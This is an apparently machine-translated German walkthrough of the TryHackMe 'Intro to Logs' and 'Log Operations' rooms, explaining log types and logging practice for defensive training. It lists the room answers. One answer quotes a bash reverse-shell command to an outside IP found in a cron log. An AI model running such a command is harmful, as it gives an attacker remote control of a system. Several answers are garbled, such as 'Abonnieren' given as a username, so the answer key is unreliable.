Wir haben eine Einführung in die Protokollierung gegeben, in der wir die Logik der Protokollerstellung und den Grund für die Erstellung von Protokollen besprochen haben. Protokolle werden erstellt und generiert, um die Leistung zu verfolgen, Sicherheitsvorfälle zu analysieren und ein Muster zu erstellen, anhand dessen zukünftige Ereignisse vorhergesagt werden können. Protokolle können Systemprotokolle, Anwendungsprotokolle, Sicherheitsprotokolle, Prüfprotokolle, Serverprotokolle und Datenbankprotokolle sein. Der Prozess der Protokollverwaltung beginnt mit dem Sammeln von Protokollen, deren Speicherung an einem zentralen Ort, dem Parsen der Protokolle und der anschließenden Analyse mithilfe von Protokollanalysetools und SIEM. Dies war Teil von TryHackMe-Einführung in Protokolle Walkthrough, das Teil des TryHackMe SOC Level 2 Track ist.

Dieser Beitrag enthält auch die Antworten für TryHackMe-Protokollvorgänge Zimmer.

OSCP-Studiennotizen

Der komplette praktische Kurs zum Penetrationstest von Webanwendungen

Höhepunkte

Protokolldateien sind Aufzeichnungen von Ereignissen, die in einer Datei in Listenform festgehalten werden. Sie können alle möglichen Informationen über Ereignisse enthalten, die zu einem bestimmten Zeitpunkt stattgefunden haben. Jedes Gerät im Netzwerk erstellt Protokolldateien und gibt Ihnen so einen Überblick über die Geschehnisse.
Protokolle enthalten normalerweise fünf Bereiche mit Überschriften. Diese sind:

  • Zeitstempel – die Zeit des Ereignisses. 
  • Protokollebene – wie schwerwiegend oder wichtig das Ereignis ist.
  • Benutzername – wer das Ereignis verursacht hat.
  • Dienst oder Anwendung – was das Ereignis verursacht hat.
  • Ereignisbeschreibung – was ist passiert.

Protokolldateitypen

  • Ereignisprotokoll – zeichnet Informationen zur Nutzung des Netzwerkverkehrs auf und verfolgt Anmeldeversuche, Anwendungsereignisse und fehlgeschlagene Kennworteingaben.
  • Systemprotokoll (oder Syslog) – zeichnet Betriebssystemereignisse auf, einschließlich Startmeldungen, Systemänderungen, Herunterfahren sowie Fehler und Warnungen.
  • Serverprotokoll – enthält eine Aufzeichnung von Aktivitäten in einem Textdokument, die sich auf einen bestimmten Server über einen bestimmten Zeitraum beziehen.
  • Änderungsprotokoll – listet Änderungen auf, die an einer Anwendung oder Datei vorgenommen wurden.
  • Verfügbarkeitsprotokoll –verfolgt Betriebszeit, Verfügbarkeit und Systemleistung.
  • Autorisierungs- und Zugriffsprotokoll – listet auf, wer auf Anwendungen oder Dateien zugreift.
  • Ressourcenprotokoll – bietet Informationen zu Verbindungsproblemen und etwaigen Kapazitätsproblemen.
  • Anwendungsprotokolle Meldungen zu bestimmten Anwendungen, einschließlich Status, Fehlern, Warnungen usw.
  • Prüfprotokolle Aktivitäten im Zusammenhang mit Betriebsabläufen, die für die Einhaltung gesetzlicher Vorschriften von entscheidender Bedeutung sind.
  • Sicherheitsprotokolle Sicherheitsereignisse wie Anmeldungen, Berechtigungsänderungen, Firewall-Aktivität usw.
  • Netzwerkprotokolle Netzwerkverkehr, Verbindungen und andere netzwerkbezogene Ereignisse.
  • Datenbankprotokolle Aktivitäten innerhalb eines Datenbanksystems, wie etwa Abfragen und Aktualisierungen.
  • Webserver-Protokolle Von einem Webserver verarbeitete Anfragen, einschließlich URLs, Antwortcodes usw.

Raumantworten | TryHackMe Einführung in Protokolle

Wie heißt Ihr Kollege, der eine Notiz auf Ihrem Desktop hinterlassen hat?

Perry

Wie lautet der vollständige Pfad zur vorgeschlagenen Protokolldatei für die erste Untersuchung?

T1566/var/log/gitlab/nginx/access.logT1566

Welcher Protokolltyp wird basierend auf der Liste der Protokolltypen in dieser Aufgabe von der Protokolldatei verwendet, die im Hinweis aus Aufgabe 2 angegeben ist?

Webserver-Protokoll

Welches Protokollformat wird basierend auf der Liste der Protokollformate in dieser Aufgabe von der Protokolldatei verwendet, die im Hinweis aus Aufgabe 2 angegeben ist?

kombiniert

Welcher Benutzername erscheint nach der Konfiguration von rsyslog für sshd wiederholt in den sshd-Protokollen unter /var/log/websrv-02/rsyslog_sshd.log, was auf fehlgeschlagene Anmeldeversuche oder Brute-Force hinweist?

Abonnieren

Wie lautet die IP-Adresse von SIEM-02 basierend auf der rsyslog-Konfigurationsdatei /etc/rsyslog.d/99-websrv-02-cron.conf, die zum Überwachen von Cron-Nachrichten verwendet wird?

10.10.10.101

Welcher Befehl wird basierend auf den generierten Protokollen in /var/log/websrv-02/rsyslog_cron.log vom Root-Benutzer ausgeführt?

/bin/bash -c „/bin/bash -i >& /dev/tcp/34.253.159.159/9999 0>&1“

Wie viele Versionen alter komprimierter Protokolldateikopien werden basierend auf der Logrotate-Konfiguration /etc/logrotate.d/99-websrv-02_cron.conf aufbewahrt?

24

Wie hoch ist basierend auf der Logrotate-Konfiguration /etc/logrotate.d/99-websrv-02_cron.conf die Protokollrotationsfrequenz?

stündlich

Welchen Fehler zeigt „/var/log/websrv-02/rsyslog_cron.log“ beim Zugriff auf die Protokollanzeige-URL für nicht analysierte Rohprotokolldateien an, wenn die verschiedenen Filter ausgewählt werden?

kein Datumsfeld

Wie erfolgt die Standardisierung analysierter Daten in ein leichter lesbares und abfragbares Format?

Normalisierung

Wie läuft die Konsolidierung normalisierter Protokolle ab, um die Analyse von Aktivitäten im Zusammenhang mit einer bestimmten IP-Adresse zu verbessern?

Anreicherung

Raumantworten | TryHackMe-Log-Operationen

Welcher der angegebenen Protokollzwecke wäre geeignet, die Kosten für die Nutzung eines Dienstes zu messen?

Betriebsbereit

Welcher der angegebenen Protokollzwecke eignet sich zur Untersuchung von Anwendungsprotokollen auf Verbesserung und Stabilität? 

Debuggen

Sie sind Berater und arbeiten für ein wachsendes Startup. Als Berater haben Sie an einer Sitzung zur Protokollkonfigurationsplanung teilgenommen. Das Unternehmen, für das Sie arbeiten, arbeitet daran, die Zahlungsinformationen konform zu verarbeiten. Der angegebene Fragensatz wird besprochen.

Auf welche Frage kann mit „So viel, wie in den PCI DSS-Anforderungen erwähnt“ geantwortet werden?

Wie viel müssen Sie loggen?

Die Sitzung geht weiter und Ihre Teamkollegen brauchen Ihre Hilfe; Sie verhandeln über das Protokollierungsbudget und die Betriebsdetails. Als Berater müssen Sie sie an einen wichtigen Punkt erinnern:

Welche Anforderungen sind nicht verhandelbar?

Betriebs- und Sicherheitsanforderungen

Ihr Team arbeitet an Richtlinien, um zu entscheiden, welche Protokolle gespeichert werden und welcher Teil für die Analyse verfügbar sein wird.
Welche der angegebenen Protokollierungsprinzipien würden umgesetzt und verbessert?

Archivierung und Barrierefreiheit

Ihr Team hat ein brandneues API-Logging-Produkt implementiert. Eines der Teammitglieder wurde mit der Erfassung der von diesem neuen Produkt generierten Protokolle beauftragt. Das Teammitglied meldete fortlaufende Fehler beim Übertragen der Protokolle auf die Prüfplattform.
Welche der genannten Schwierigkeiten tritt in diesem Fall auf?

Verarbeiten und Archivieren

Sie führen als Berater eine umfassende Risikobewertung durch und stellen fest, dass eines der Entwicklungsteams ein benutzerdefiniertes Skript zur Generierung von Protokollen für ein altes System implementiert hat, bei dem in einigen Phasen die Protokollierung ausgelassen wird.

Wie würden Sie das nennen? (Fehler oder Übung?)

Fehler

Video-Komplettlösung

, ,
Anmerkungen anzeigen

Motasem

Über den Autor

Ich erstelle Notizen zur Cybersicherheit, Notizen zum digitalen Marketing und Online-Kurse. Ich biete auch Beratung zum digitalen Marketing an, einschließlich, aber nicht beschränkt auf SEO, Google- und Meta-Anzeigen und CRM-Verwaltung.

Artikel anzeigen